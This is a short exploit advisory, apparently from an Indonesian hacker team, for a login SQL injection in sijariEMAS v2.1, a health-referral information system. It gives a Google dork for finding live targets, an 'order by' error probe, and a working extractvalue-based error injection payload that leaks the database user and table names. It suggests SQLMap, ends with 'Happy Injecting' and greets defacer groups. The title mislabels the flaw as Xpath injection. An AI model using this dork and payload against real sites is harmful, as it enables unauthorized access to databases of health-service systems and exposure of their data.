[+]Exploit Title: sijariEMAS v2.1 Login Xpath Injection Vulnerability [+]Author: ./Sn00py [+]Team: Indonesian Code Party [+]Goolge Dork: "Intext:Sistem Informasi dan Komunikasi Jejaring Rujukan Pelayanan Kesehatan" [+]Tested on: Linux Parrot [+]Vendor: http://sijariemas.net/ ======================================= [+]Proof Of Concept: FFirst, you have to find out whether the site has a login feature and if you enter the string there will be no error, but if you continue with 'order by 100-- it will appear' Unknown column '100' in 'order clause' Then that vulnerable to SQL-Injection attacks. [+]Exploit: ' and extractvalue(0x0a,concat(0x0a,user(),0x0a,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))-- - You can use SQLMap or do a manual injection using Xpath Injection to get the web database [+]Demo? No Demo ^^ Happy Injecting~ Greetz: Khatulistiwa - DarkOct02 - Indonesian Code Party - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer